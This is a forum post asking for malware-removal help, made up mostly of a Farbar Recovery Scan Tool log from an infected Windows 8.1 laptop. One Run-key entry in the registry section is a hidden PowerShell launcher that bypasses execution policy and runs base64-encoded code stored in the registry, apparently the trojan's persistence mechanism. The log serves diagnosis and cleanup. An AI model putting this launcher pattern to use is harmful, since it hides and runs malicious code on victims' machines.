Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Infected with win64/trojandownloader.wauchos


  • This topic is locked This topic is locked
4 replies to this topic

#1 J2M-CJBE

J2M-CJBE

  • Members
  • 6 posts
  • OFFLINE
  •  

Posted 01 December 2016 - 01:34 PM

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 30-11-2016
Ran by Ptr. Julius Lampao (administrator) on PASTOR (02-12-2016 01:55:44)
Running from C:\Users\Ptr. Julius Lampao\Downloads\Programs
Loaded Profiles: Ptr. Julius Lampao (Available Profiles: Ptr. Julius Lampao)
Platform: Windows 8.1 (Update) (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(ESET) C:\Program Files\ESET\ESET Smart Security\ekrn.exe
(Windows ® Win 7 DDK provider) C:\Program Files (x86)\Bluetooth Suite\AdminService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Framework\Common\avgsvca.exe
(Seiko Epson Corporation) C:\Windows\System32\escsvc64.exe
() C:\ProgramData\Globe Tattoo Broadband\OnlineUpdate\ouc.exe
() C:\Program Files (x86)\HPDef\HomePageDefSrv.exe
() C:\ProgramData\DatacardService\HWDeviceService64.exe
(Intel® Corporation) C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.31.5\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.31.5\GoogleCrashHandler64.exe
(arvato digital services llc) C:\Program Files\Common Files\Protexis\License Service\PsiService_2.exe
(TOSHIBA Corporation) C:\Windows\System32\TODDSrv.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesService64.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesApp64.exe
(ESET) C:\Program Files\ESET\ESET Smart Security\egui.exe
(Microsoft Corporation) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
(SEIKO EPSON CORPORATION) C:\Windows\System32\spool\drivers\x64\3\E_YATIN2E.EXE
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Framework\Common\avguix.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Tonec Inc.) C:\Program Files (x86)\Tonec\IDMan.exe
(Tonec Inc.) C:\Program Files (x86)\Tonec\IEMonitor.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(VS Revo Group) C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe
 
 
==================== Registry (Whitelisted) ====================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [] => [X]
HKLM\...\Run: [TSSSrv] => C:\Program Files (x86)\TOSHIBA\System Setting\TSSSrv.exe [296008 2013-10-22] (TOSHIBA Corporation)
HKLM\...\Run: [TecoResident] => C:\Program Files\TOSHIBA\Teco\TecoResident.exe [179040 2013-10-16] (TOSHIBA Corporation)
HKLM\...\Run: [TosWaitSrv] => C:\Program Files\TOSHIBA\TPHM\TosWaitSrv.exe [354144 2013-08-14] (TOSHIBA Corporation)
HKLM\...\Run: [TCrdMain] => C:\Program Files\TOSHIBA\Hotkey\TCrdMain_Win8.exe [2556768 2013-10-09] (TOSHIBA Corporation)
HKLM\...\Run: [TNOD UP] => C:\Program Files\TNod User & Password Finder\TNODUP.exe [5592576 2015-12-20] (Tukero[X]Team)
HKLM\...\Run: [CanonMyPrinter] => C:\Program Files\Canon\MyPrinter\BJMyPrt.exe [2710856 2009-11-02] (CANON INC.)
HKLM\...\Run: [CanonSolutionMenu] => C:\Program Files (x86)\Canon\SolutionMenu\CNSLMAIN.exe [767312 2009-09-04] (CANON INC.)
HKLM\...\Run: [Corel Update Helper] => c:\Program Files\Corel\Corel VideoStudio X9\pua.exe [2012104 2016-03-01] (Corel Corporation)
HKLM-x32\...\Run: [AmIcoSinglun64] => C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe [383768 2002-04-13] (Alcor Micro Corp.)
HKLM-x32\...\Run: [1.TPUReg] => C:\Program Files (x86)\TOSHIBA\PasswordUtility\readLM.exe [2216800 2013-03-28] (TOSHIBA)
HKLM-x32\...\Run: [TSVU] => c:\Program Files\TOSHIBA\TOSHIBA Smart View Utility\TosSmartViewLauncher.exe [516512 2013-07-23] (TOSHIBA)
HKLM-x32\...\Run: [EaseUS EPM tray] => C:\Program Files (x86)\EaseUS\EaseUS Partition Master 9.2.2\bin\EpmNews.exe [2081792 2013-03-29] (CHENGDU YIWO Tech Development Co., Ltd)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [594992 2016-01-30] (Oracle Corporation)
HKLM-x32\...\Run: [AvgUi] => C:\Program Files (x86)\AVG\Framework\Common\avguirna.exe [218896 2016-09-13] (AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1156824 2016-09-16] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59720 2013-09-13] (Apple Inc.)
Winlogon\Notify\igfxcui: C:\WINDOWS\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\Run: [E09AXLRD_952483187] => C:\Program Files (x86)\Microsoft Encarta\Encarta Premium DVD 2009\EDICT.EXE [351000 2008-06-01] (Microsoft Corporation)
HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\Run: [{C3BD8F3E-7B27-4B7D-BBAD-B7A84FD1BB4B}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\OojMMNdiocWAVsyTshnwAcJXmY').HDUVWDW (the data entry has 22 more characters).
HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\Run: [EPLTarget\P0000000000000000] => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YATIN2E.EXE [298560 2014-03-20] (SEIKO EPSON CORPORATION)
HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\Run: [IDMan] => C:\Program Files (x86)\Tonec\IDMan.exe [3907152 2015-07-07] (Tonec Inc.)
HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\Run: [Viber] => C:\Users\Ptr. Julius Lampao\AppData\Local\Viber\Viber.exe [45518928 2016-11-18] (Viber Media S.Ã  r.l.)
HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\MountPoints2: {18e4faf5-c27a-11e4-8268-202564357a82} - "D:\AutoRun.exe" 
HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\MountPoints2: {2d69a757-5bc8-11e6-85e6-202564357a82} - "E:\Setup.exe" /s
HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\MountPoints2: {323534f9-6d01-11e5-832b-202564357a82} - "E:\AutoRun.exe" 
HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\MountPoints2: {3bcedd81-8c22-11e5-83d7-202564357a82} - "E:\AutoRun.exe" 
HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\MountPoints2: {5099ff1f-8738-11e5-83ba-202564357a82} - "E:\AutoRun.exe" 
HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\MountPoints2: {5099ff7c-8738-11e5-83ba-202564357a82} - "E:\AutoRun.exe" 
HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\MountPoints2: {5099ffe4-8738-11e5-83ba-202564357a82} - "E:\AutoRun.exe" 
HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\MountPoints2: {6b618252-6672-11e5-8305-202564357a82} - "E:\Setup.exe" /s
HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\MountPoints2: {70d980af-29c0-11e5-827a-202564357a82} - "E:\AutoRun.exe" 
HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\MountPoints2: {754f533b-ef3d-11e5-85c4-202564357a82} - "E:\.\ShowModem.exe" 
HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\MountPoints2: {9fef62a6-9ea1-11e5-8445-202564357a82} - "E:\AutoRun.exe" 
HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\MountPoints2: {a13b23e7-9d0c-11e5-8439-202564357a82} - "E:\AutoRun.exe" 
HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\MountPoints2: {b4c31913-9df2-11e5-843f-202564357a82} - "E:\AutoRun.exe" 
HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\MountPoints2: {ed5b73f1-7fd7-11e4-825d-202564357a82} - "E:\AutoRun.exe" 
IFEO\AcroRd32.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe"
IFEO\shareit.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe"
IFEO\skype.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe"
IFEO\tecoresident.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe"
IFEO\toshibaservicestation.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe"
IFEO\tpchviewer.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe"
IFEO\wampmanager.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe"
ShellIconOverlayIdentifiers: [IDM Shell Extension] -> {CDC95B92-E27C-4745-A8C5-64A52A78855D} => C:\Program Files (x86)\Tonec\IDMShellExt64.dll [2014-04-21] (Tonec Inc.)
Startup: C:\Users\Ptr. Julius Lampao\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Canon IJ Status Monitor Canon iP2700 series.lnk [2016-02-29]
ShortcutTarget: Canon IJ Status Monitor Canon iP2700 series.lnk -> C:\Users\PTR~1.JUL\CNMSSC~1.DLL,SMStarterEntryPoint USB001;Canon iP2700 series;cnmss Canon iP2700 series (Local).dll;Canon IJ Status Monitor Canon iP2700 series.lnk (No File)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.6.29 192.168.6.29
Tcpip\..\Interfaces\{5457DDFE-6CCD-4749-945C-93B0DA455B6B}: [DhcpNameServer] 192.168.168.1
Tcpip\..\Interfaces\{70B16E01-C289-4890-8FD5-0C0DC58BA268}: [DhcpNameServer] 192.168.6.29 192.168.6.29
 
Internet Explorer:
==================
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://toshiba13.msn.com/?pc=TAJB
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://toshiba13.msn.com/?pc=TAJB
HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://toshiba13.msn.com/?pc=TAJB
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
BHO: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Tonec\IDMIECC64.dll [2015-07-08] (Internet Download Manager, Tonec Inc.)
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll [2015-08-12] (Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_73\bin\ssv.dll [2016-02-11] (Oracle Corporation)
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-05-25] (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office15\GROOVEEX.DLL [2015-07-14] (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_73\bin\jp2ssv.dll [2016-02-11] (Oracle Corporation)
BHO-x32: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Tonec\IDMIECC.dll [2015-07-08] (Internet Download Manager, Tonec Inc.)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office15\OCHelper.dll [2015-08-12] (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\ssv.dll [2016-02-11] (Oracle Corporation)
BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-05-25] (Microsoft Corporation)
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office15\GROOVEEX.DLL [2015-07-14] (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\jp2ssv.dll [2016-02-11] (Oracle Corporation)
Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office\Office15\MSOSB.DLL [2014-04-01] (Microsoft Corporation)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-05-25] (Microsoft Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-05-25] (Microsoft Corporation)
 
FireFox:
========
FF ProfilePath: C:\Users\Ptr. Julius Lampao\AppData\Roaming\Mozilla\Firefox\Profiles\6xa2s449.default-1466826215296 [2016-11-30]
FF HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\Firefox\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Users\Ptr. Julius Lampao\AppData\Roaming\IDM\idmmzcc7
FF Extension: (IDM integration) - C:\Users\Ptr. Julius Lampao\AppData\Roaming\IDM\idmmzcc7 [2016-11-05] [not signed]
FF HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\SeaMonkey\Extensions: [mozilla_cc@internetdownloadmanager.com] - C:\Users\Ptr. Julius Lampao\AppData\Roaming\IDM\idmmzcc5
FF Extension: (IDM CC) - C:\Users\Ptr. Julius Lampao\AppData\Roaming\IDM\idmmzcc5 [2016-11-05] [not signed]
FF HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\SeaMonkey\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Program Files (x86)\Tonec\idmmzcc2.xpi
FF Extension: (IDM integration) - C:\Program Files (x86)\Tonec\idmmzcc2.xpi [2015-07-15] [not signed]
FF Plugin: @java.com/DTPlugin,version=11.73.2 -> C:\Program Files\Java\jre1.8.0_73\bin\dtplugin\npDeployJava1.dll [2016-02-11] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.73.2 -> C:\Program Files\Java\jre1.8.0_73\bin\plugin2\npjp2.dll [2016-02-11] (Oracle Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~1\Office15\NPSPWRAP.DLL [2014-01-23] (Microsoft Corporation)
FF Plugin-x32: @canon.com/EPPEX -> C:\Program Files (x86)\Canon\Easy-PhotoPrint EX\NPEZFFPI.DLL [2010-02-05] (CANON INC.)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/pdf -> C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2014-10-20] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.fdf -> C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2014-10-20] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.xdp -> C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2014-10-20] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.xfdf -> C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2014-10-20] (Foxit Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.73.2 -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\dtplugin\npDeployJava1.dll [2016-02-11] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.73.2 -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\plugin2\npjp2.dll [2016-02-11] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2015-08-12] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office15\NPSPWRAP.DLL [2014-01-21] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-29] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-29] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [2013-07-13] ()
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2016-10-01] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npMeetingJoinPluginOC.dll [2015-08-12] (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll [2016-10-01] (Adobe Systems Inc.)
 
Chrome: 
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\Ptr. Julius Lampao\AppData\Local\Google\Chrome\User Data\Default [2016-12-02]
CHR Extension: (Data Compression Proxy) - C:\Users\Ptr. Julius Lampao\AppData\Local\Google\Chrome\User Data\Default\Extensions\ajfiodhbiellfpcjjedhmmmpeeaebmep [2016-05-05]
CHR Extension: (Google Drive) - C:\Users\Ptr. Julius Lampao\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-30]
CHR Extension: (YouTube) - C:\Users\Ptr. Julius Lampao\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-10-30]
CHR Extension: (Google Search) - C:\Users\Ptr. Julius Lampao\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-30]
CHR Extension: (MK Instagram Downloader) - C:\Users\Ptr. Julius Lampao\AppData\Local\Google\Chrome\User Data\Default\Extensions\dodjaekpogacdaoikfhjfjooeglmgpkp [2016-06-06]
CHR Extension: (Who Deleted Me) - C:\Users\Ptr. Julius Lampao\AppData\Local\Google\Chrome\User Data\Default\Extensions\eiepnnbjenknnjgabbodaihlnkkpkgll [2016-11-17]
CHR Extension: (KProxy Extension) - C:\Users\Ptr. Julius Lampao\AppData\Local\Google\Chrome\User Data\Default\Extensions\gdocgbfmddcfnlnpmnghmjicjognhonm [2016-11-19]
CHR Extension: (Cut the Rope) - C:\Users\Ptr. Julius Lampao\AppData\Local\Google\Chrome\User Data\Default\Extensions\gkddaofiamhgfjmaccfcfpfolpgbeomj [2016-08-25]
CHR Extension: (Pinterest Save Button) - C:\Users\Ptr. Julius Lampao\AppData\Local\Google\Chrome\User Data\Default\Extensions\gpdjojdkbbmdfjfahjcgigfpmkopogic [2016-11-01]
CHR Extension: (NetBeans Connector) - C:\Users\Ptr. Julius Lampao\AppData\Local\Google\Chrome\User Data\Default\Extensions\hafdlehgocfcodbgjnpecfajgkeejnaa [2015-11-23]
CHR Extension: (Blocky Sniper) - C:\Users\Ptr. Julius Lampao\AppData\Local\Google\Chrome\User Data\Default\Extensions\hclgbbaloijjnkpigapgmocdpoblnlec [2016-11-28]
CHR Extension: (Grammarly for Chrome) - C:\Users\Ptr. Julius Lampao\AppData\Local\Google\Chrome\User Data\Default\Extensions\kbfnbcaeplbcioakkpcpgfkobkghlhen [2016-11-26]
CHR Extension: (Skype) - C:\Users\Ptr. Julius Lampao\AppData\Local\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2016-10-21]
CHR Extension: (Google Keep Chrome Extension) - C:\Users\Ptr. Julius Lampao\AppData\Local\Google\Chrome\User Data\Default\Extensions\lpcaedmchfhocbbapmcbpinfpgnhiddi [2016-11-22]
CHR Extension: (KProxy Background App) - C:\Users\Ptr. Julius Lampao\AppData\Local\Google\Chrome\User Data\Default\Extensions\maicibfoihmlppibfkljeljefamfndbp [2016-11-19]
CHR Extension: (Cut the Rope Time Travel) - C:\Users\Ptr. Julius Lampao\AppData\Local\Google\Chrome\User Data\Default\Extensions\mobpckplhphcfdikfajajihmljhlmkod [2016-08-25]
CHR Extension: (IDM Integration Module) - C:\Users\Ptr. Julius Lampao\AppData\Local\Google\Chrome\User Data\Default\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2016-11-12]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Ptr. Julius Lampao\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-04]
CHR Extension: (Gmail) - C:\Users\Ptr. Julius Lampao\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-10-30]
CHR Extension: (Chrome Media Router) - C:\Users\Ptr. Julius Lampao\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-10-27]
CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Tonec\IDMGCExt.crx [2015-07-15]
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2016-05-25]
CHR HKLM-x32\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Tonec\IDMGCExt.crx [2015-07-15]
 
==================== Services (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [312448 2013-10-01] (Windows ® Win 7 DDK provider) [File not signed]
R2 avgsvc; C:\Program Files (x86)\AVG\Framework\Common\avgsvca.exe [1149712 2016-09-13] (AVG Technologies CZ, s.r.o.)
S4 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1364096 2016-05-25] (Microsoft Corporation)
S4 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1687680 2016-05-25] (Microsoft Corporation)
R2 ekrn; C:\Program Files\ESET\ESET Smart Security\ekrn.exe [2770312 2016-11-30] (ESET)
R2 EpsonScanSvc; C:\WINDOWS\system32\EscSvc64.exe [144560 2012-05-17] (Seiko Epson Corporation)
S4 GamesAppIntegrationService; C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe [235008 2013-07-17] (TODO: <Company name>) [File not signed]
S4 GFNEXSrv; C:\Program Files (x86)\TOSHIBA\PasswordUtility\GFNEXSrv.exe [163168 2013-03-28] ()
S2 Globe Tattoo Broadband. RunOuc; C:\Program Files (x86)\Globe Tattoo Broadband\UpdateDog\ouc.exe [218624 2015-11-10] () [File not signed]
R2 HPDef Service; C:\Program Files (x86)\HPDef\HomePageDefSrv.exe [331944 2016-05-21] ()
R2 HWDeviceService64.exe; C:\ProgramData\DatacardService\HWDeviceService64.exe [339456 2010-11-16] () [File not signed]
S4 IJPLMSVC; C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE [140936 2013-05-15] ()
R2 Intel® Capability Licensing Service Interface; C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe [733696 2013-07-02] (Intel® Corporation) [File not signed]
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\TXE Components\TCS\SocketHeciServer.exe [822232 2013-07-02] (Intel® Corporation)
R2 PSI_SVC_2_x64; c:\Program Files\Common Files\Protexis\License Service\PsiService_2.exe [337776 2014-04-30] (arvato digital services llc)
S4 ShareItSvc; C:\Program Files (x86)\SHAREit\SHAREit\Shareit.Service.exe [33224 2016-04-15] (SHAREit Technologies Co.Ltd)
S4 THAccelSvc; C:\Program Files\TOSHIBA\HDD Accelerator\THAccelSvc.exe [216976 2013-10-18] (TOSHIBA CORPORATION)
R2 TuneUp.UtilitiesSvc; C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesService64.exe [4788496 2016-11-02] (AVG Technologies CZ, s.r.o.)
S4 wampapache; c:\wamp\bin\apache\apache2.4.9\bin\httpd.exe [22016 2014-05-02] (Apache Software Foundation) [File not signed]
S4 wampmysqld; c:\wamp\bin\mysql\mysql5.6.17\bin\mysqld.exe [10959360 2014-05-02] () [File not signed]
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [348392 2013-10-31] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23824 2013-10-31] (Microsoft Corporation)
 
===================== Drivers (Whitelisted) ======================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
